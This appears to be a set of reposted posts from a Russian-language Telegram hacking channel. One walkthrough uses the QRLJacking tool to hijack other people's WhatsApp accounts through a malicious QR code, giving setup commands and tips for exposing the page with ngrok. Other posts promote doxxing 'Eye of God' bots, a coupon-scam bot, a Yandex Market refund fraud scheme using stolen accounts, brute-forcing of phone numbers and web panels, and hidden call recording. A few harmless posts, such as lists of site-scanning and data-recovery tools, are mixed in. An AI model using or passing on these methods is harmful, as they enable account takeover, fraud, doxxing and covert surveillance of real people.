Великолепно мощный сканер портов
RustScan - это новый и современный сканер портов со своим собственным взяглядом на сканирование уязвимостей. Даже не говоря о том, что RustScan использует машинное обучение, чтобы совершенствоваться по мере использования он имеет много плюсов перед другими сканерами.
Особенности:
• Поддерживает IPv6, CIDR, ввод через файлы.
• Сканирует все 65000 портов всего-лишь за 3 секунды.
• Имеет полную поддержку скриптов.
• Автоматическое перенаправление портов в Nmap.
• Использует Адаптивное обучение. • Чем больше вы его используете, тем лучше он становится.
Расширяемость
RustScan отдает результаты в собственные скрипты Python. Также он иимеет новый собственный движок для user-скриптов, который дает пользователю возможность писать свои скрипты на современных языках программирования, в точности сейчас есть поддержка Lua, Python, а также Shell. Если Вы хотите взять найденные порты и передать их в Nmap для дальнейшего анализа или запустить smb-enum, если SMB обнаружен открытым - то с Rust Scan это теперь возможно.
Адаптивность
RustScan автоматически сам настроится в соответствии с ОС хоста на котором устанавливается. «Адаптивное обучение» в RustScan - это множество функций которые сами «узнают» о среде, которую вы сканируете, а также, как вы используете RustScan, чтобы со временем улучшить себя и соответственно улучшить результаты.
◽Установка
Для начала Вам необходим установленный Nmap на Вашей системе. Если у вас установлена ОС Kali Linux или Parrot для проведения аудитов безопасности, то, у вас уже предустановлен Nmap.
Для установки nmap в Ubuntu / Linux Mint / Debian, введите в Терминал:
◾sudo apt update && sudo apt upgrade
◾sudo apt install nmap
Теперь установим сам RustScan. Для установки можно использовать один из пакетов, соответствующего для вашей системы, например HomeBrew или Yay для Arch Linux.
1. Качаем релиз по ссылке Releases
2. Запускаем файл командой dpkg -i <имя загруженного файла>
◽Использование
Сканирование сразу нескольких IP адресов
◾rustscan -a 127.0.0.1, 0.0.0.0
Внимание! Уже совсем скоро начинаем публиковать различный софт. Поднимаем актив!
Читать полностью…
Создаём свой «Глаз Бога»
Поехали:
Открывает в телеге бота @CreaterGBOT, он у нас спрашивает API-ключ нашего бота, где его взять?
1.1. Открываем бот @BotFather.
1.2. Отправляем команду /start
1.3. Отправляем команду /newbot
1.4. Вводим название бота. Оно будет отображаться в списке чатов.
1.5. Вводим юзернейм бота. Название должно обязательно оканчиваться на «bot»
1.6. После Успешного создания бота, вы увидите сообщение выше, и там же будет токен формата: 123456789:
Далее....
Копируем API-ключ из @botfather в @CreaterGBOT
ГОТОВО!!! Теперь у вас свой собственный "Глаз Бога", который в меню @CreaterGBOT можете сделать приватным(бот будет отвечать только вам), либо оставить как публичный...
Если страрого блокнут, то новый специально для подписчиков DeepAvito
@Deepavitoeyesbot
Сегодня мы разберемся, как взломать чужой аккаунт в мессенджере WhatsApp с помощью вредоносного QR-кода.
Для начала устанавливаем последнюю версию geckdriver по ссылке:
https://github.com/mozilla/geckodriver/releases
После установки вводим следующие команды:mv -f geckodriver /usr/local/share/geckodriver
ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
Далее клонируем инструмент с репозитория GitHub:git clone https://github.com/OWASP/QRLJacking
Переходим в директорию инструмента:cd QRLJacking/QRLJacker
Устанавливаем зависимости:python -m pip install -r requirements.txt
И запускаем инструмент:python QrlJacker.py
Перед нами отроется меню инструмента, где мы создаем ссылку на вредоносный QR-код для кражи WhatsApp:use grabber/whatsapp
set <ip-адрес атакующего>
set port 1337
run
Инструмент сгенерирует ссылку на страницу с вредоносным QR-кодом, ссылку на которую можно получить с помощью команды:jobs
Данная ссылка будет работать в локальной сети. Для того, чтобы сделать ее общедоступной, можно воспользоваться ngrok.
❗️Глаз бога восстановлен❗️
Новый тэг: @EyeOfGodOnionBot
#лайфхак
Сайты для проверки сайтов на угрозы
Были ситуации, когда нужно скачать что-то важное, но сайт незнакомый и сомнительный? Не надо рисковать. Чекаем сайты онлайн-антивирусом. Для максимальной безопасности лучше проверять сразу несколькими сервисами, на случай если где-то базы не полные.
Sucuri - здесь можно бесплатно проверить сайт на вирусы и вредоносное ПО. Довольно популярный и точный онлайн-сканер.
URL Dr. Web - бесплатный онлайн сканер вирусов и вредоносного ПО. На сайте описаны симптомы заражения сайта и некоторая подробная информация.
Safeweb - помимо анализа и проверки сайта на вредоносы, показывают его рейтинг и позволяет почитать отзывы.
VirusTotal - хороший и очень известный по всему миру ресурс, который проверяет есть ли Ваш сайт в вирусной базе данных наиболее популярных антивирусов и прочих подобных сервисов.
Automatic mail sender
Взломанная программа для массовой рассылки электронных писем с очень хорошим функционалом.
Отличная утилита, на которой можно сделать неплохие деньги, если немного включить голову.
#софт
FireChat
Инструмент обмена сообщениями, который, в отличие от всех других, не нуждается в подключении к Интернету для отправки и получения сообщений. Это связано с сетевой технологией OpenGarden, которая позволяет вам общаться с другими устройствами поблизости, даже если у них нету подключения к сети Интернет.
❗💾 Скачать
Записываем чужие разговоры
Предоставляем вашему вниманию несколько отличных приложений для записи разговоров. Но помните, собирать информацию и следить за людьми без их на то согласие - противозаконно. Мы вас предупредили!
Сервисы для записывания разговоров:
1. Phone Recorder → ТЫК ← все инструкции и рекомендации по установки и настройки программы находятся на сайте. Также, для скачивания вам нужно будет зарегаться на нем. При этом, приложение действительно стоящее, так как позволяет напрямую отправлять записи на облако и почту.
2. Call Recorder → ТЫК ← также необходимо правильно и грамотно настроить, что позволит сделать программку скрытой. При этом, вам не нужно заморачиваться со скачиванием. Загружаем просто через Play market.
Пользуйтесь, но используйте в целях развлечения, а не в каких-либо других!
#лайфхак
Скрываем свои запросы в браузере
TrackMeNot - расширение для браузера, предназначенное для скрытия ваших запросов в поисковых системах путём запутывания.
Как это работает - TrackMeNot с разной периодичностью отправляет случайные поисковые запросы, и тем самым ваши поисковые запросы скрываются за кучей бесполезных запросов.
Скачать - https://trackmenot.io/
Лучшие анонимные браузеры
Приветствую друзья! Большинство браузеров собирают информацию о пользователях. На основе поисковых запросов, посещённых страниц, прочитанных статей и просмотренных видео строится цифровое досье пользователя, включающее в себя личные данные, интересы и даже политические пристрастия. Именно поэтому, наша команда представляет Вам список лучших браузеров для анонимного серфинга в интернете.
Наш список:
1. Tor
Сеть маршрутизаторов и специальное программное обеспечение, которое предназначено для того, чтобы вас было невозможно идентифицировать во время сёрфинга в интернете.
🔗 Установить – ТЫК
2. Epic Browser
Одна из сборок браузера Chromium со встроенным набором расширений и настроек, которые позволяют скрыться от слежения.
🔗 Установить – ТЫК
3. SRWare Iron
Данный браузер также основан на базе Chromium, который послужил стартовой площадкой для браузера от компании Google. Используя его, вашу личность будет невозможно определить.
🔗 Установить – ТЫК
#скрипт #python
Скрипт бота для продажи купонов + инструкция
Простенький бот для скама даунов на купоны Яндекс еда, Самокат, Додо-пицца, Ситилинк, DNS, M-video. Наливаем трафик и получаем прибыль.
Топ 5 рабочих Vpn сервисов на данный момент:
1 - Express Vpn (для регистрации нужен посторонний Vpn (можете использовать Vpn manager))
2 - Vpn manager (для регистрации нужна почта (аккаунт действителен 2 дня))
3 - Vpn в браузере Aloha
4 - Orbot
5 - Seagull Vpn
Bettercap - мощный, легко расширяемый и портативный инструмент для исследователей в области безопасности
Все-в-одном решения со всеми функциями , они могут понадобиться для проведения разведки и нападения:
🗃Сканирование сетей Wi-Fi , атака деаутентификации, атака ассоциации PMKID без клиента и автоматический захват клиентских рукопожатий WPA / WPA2.
🗃Сканирование устройств Bluetooth Low Energy
🗃Сканирование беспроводных устройств с частотой 2,4 ГГц и атаки MouseJacking с беспроводной инъекцией HID-кадров (с поддержкой DuckyScript).
🗃Зондирование и разведка пассивных и активных IP-узлов сети.
🗃Спуферы ARP, DNS и DHCPv6 для MITM-атак в IP-сетях.
🗃Прокси-серверы на уровне пакетов, TCP и HTTP / HTTPS- приложений полностью поддерживают сценарии с помощью простых в реализации плагинов javascript
🗃Мощный сетевой сниффер для сбора учетных данных, который также можно использовать в качестве фаззера сетевых протоколов
🗃Очень быстрый сканер портов.
🗃Очень удобный веб-интерфейс
GitHub репозитория
То что спасет ваш компьютер от майнеров. Проверяет все процессы на майнеры и удаляет их. Если часто что-то скачиваете, советую сохранить.
Читать полностью…
Новый глаз бога @eyeeofgodsbot , он чет молчит, ну ждем крч
Читать полностью…
Роскомнадзор активно борится с телеграмм ботами, в настоящее время упали сервера многих ботов
Читать полностью…
Blocked bots:
@HowToFind_Bot (By the way, this bot only stored ways to search for information about the person. Not the information itself)
@mailsearchbot
@osintshopbot
@EyeGodsBot
Refund «Яндекс Маркет» (10.03.2021)
Айо, бандиты! Достал для вас невероятно ЖИРНУЮ тему, которая позволит получать товары с "Яндекс Маркета" абсолютно на халяву.
Тема хорошо комбинируется с покупкой брученных аккаунтов, таким образом можно будет получать возврат средств в купонах без покупок чего-либо и сразу же заказывать вещи на свой адрес (на языке реферов это называется "бесконтакт").
Уверен, мой труд скопипастят все петушковые каналы, поэтому запомните где вы увидели эту схему впервые ✌️
slivmens/hdqMV-5-0" rel="nofollow">https://teletype.in/@slivmens/hdqMV-5-0
#слив #вещевуха #взято_с_канала
Telegram обязали заблокировать ботов
Роскомнадзор направил в Телеграм требование о блокировке ботов, собирающих и распространяющих персональные данные граждан Российской Федерации.
На этот раз РКН не блокирует мессенджер, а соблюдает закон о персональных данных, защищая приватность граждан.
Владельцы ботов, распространяющие личную информацию, зарабатывали на этом деньги.
#софт
Снайпер Discord Nitro
Discord Nitro Sniper - программа, считывающая гифты дискорд нитро из чатов серверов, в которых вы находитесь. Для работы нужен токен вашего аккаунта Discord.
Инструкция по установке и использованию на Termux:
1. apt-get install python (если у вас не установлен Python)
2. git clone https://github.com/Vedza/NitroSniper
3. python -m pip install httpx discord.py colorama
4. cd NitroSniper
5. python sniper.py
6. Введите свой токен
Готово! Программа начнёт снайпить гифты дискорд нитро из чатов.
Поиск номера телефона по email
В настоящие время все меньше людей предпочитают делиться своим номером телефона в Интернете. И это правильно, в свете участившихся случаев телефонного мошенничества, пробива информации и просто DDOS атак. Однако регистрируясь на определенных ресурсах пользователи часто используют номер телефона, часть которого отображается при попытке сброса. Основываясь на этой, а также на технологии web scrapping, утилита email2phonenumber ищет номера телефонов по email.
Установка: ТЫК
Использование
Опция поиска номера по сайтам запускается командой:
python email2phonenumber.py scrape -e target@email.com
Поиск номера путем сбросов паролей на сайтах осуществляется командой
python email2phonenumber.py bruteforce -m 555XXX1234 -e target@email.com -p /tmp/proxies.txt -q
Где после параметра -m нужно поставить маску номера, то есть ввести все известные цифры, а неизвестные заменить на X
WPFINDER - поиск web-панелей
Всем привет, сегодня речь пойдет у нас о web панелях или же как их заполучить, другими словами - брутфорс веб панелей.
Обновляем термукс:
apt-get updateКачаем git и python:
apt-get upgrade
apt-get install gitКачаем сам инструмент:
apt-get install python
git clone https://github.com/samuraisudo/WPFinder.gitЗапуск:
cd WPFinderПри запуске инструмент нам покажет какие порты будет проверять. Мы можем добавить поиск и по другим портам их в новую строку в файле USE_PORTS.rf. Чтобы сохранить изменения портов для поиска, вводим END и жмём Enter. Затем указываем IP-адрес по которому будет происходить поиск. IP адреса можно указывать сколько угодно через пробелы, далее инструмент будет искать и выводить результаты. Читать полностью…
pip install requests
python main.py
Программы для восстановления данных жесткого диска
Приветствую друзья! Сегодня я предлагаю вам ознакомится с утилитами, которые наоборот восстанавливают данные после обычного форматирования.
1. Recuva
2. PhotoRec
3. DMDE
4. Disk Drill
5. Puran File Recovery
6. RecoveRx
7. MiniTool Power Data Recovery
8. Stellar Data Recovery
9. Data Rescue
Почти все утилиты бесплатные.
Лучшие проги для анонимности!
Сегодня мы решили поделиться с вами списком, в который пошли самые эффективные сервисы-анонимайзеры!
Итак, приступим:
1. STZBlaster → ТЫК ← данная прога позволит вам изменить имена, начиная от имени ПК, хоста, и заканчивая ID процессора. Также, позволяет изменить региональные настройки. Будьте осторожны при изменении MAC настроек, они могут негативно отразится на работе вашей системы.
2. RMOSChange → ТЫК ← интересная програмка для смены HTTP-заголовков браузеров. Данная прога может пригодиться вам для смены языковых норм браузера, его местонахождения, а также для подмены user-agent, что позволит вам беспрепятственно заходить на сайты других стран и регионов.
3. SMAC 2.0 → ТЫК ← сие чудо позволяет менять MAC адрес сетевой платы, раз в месяц.
4. Privacy Suite Main Menu → ТЫК ← программа для сейва крипты в созданные контейнеры jpg, wav файлы, для усложнения их обнаружения. Еще прога позволят переносить крипту на флешку. Контейнер с шифром можно открыть уже без использования данной проги.
5. TrueCrypt → ТЫК ← одна из лучших программ для шифрования важной информации.
6. Proxyfier → ТЫК ← проксификатор с возможностью задать приложение, которое будет соксифицировано.
7. OpenVPN GUI → ТЫК ← один из самых эффективных VPN сервисов.
8. VPSProxy → ТЫК ← тоже отличный VPN, с постоянно меняющимися серверами, что позволяет вам наиболее эффективно скрывать себя в сети.
9. O&O SafeErase → ТЫК ← программа, для безвозвратного удаления файлов с вашего ПК.
Смотрим удаленные сообщения в Telegram
Салам, бандиты. Представляю вашему вниманию неофициальный плагин с открытым исходным кодом, который позволит смотреть сообщения в Telegram Desktop после того как собеседник удалил их.
Установка & использование
1. Переходим на страницу плагина в GitHub;
2. Скачиваем последнюю версию плагина (в данный момент это v0.3.0, прямая ссылка для скачивания);
3. Если у вас запущен клиент Telegram, то закрываем его;
4. Копируем файл version.dll в корневую папку Telegram (Путь к корневой папке: C:\Users\Username\AppData\Roaming\Telegram Desktop);
5. Запускаем Telegram;
Последняя версия плагина совместима только с Telegram v2.4.0 ~ v2.5.7 или выше. Если вы используете бета-версию Telegram, проверьте последнюю предварительную версию. (Обновления совместимости для бета-версии Telegram могут быть выпущены не вовремя). Если вы все правильно сделали, то когда ваш собеседник удалит у вас сообщение, появится пометка "удалено" ✌️
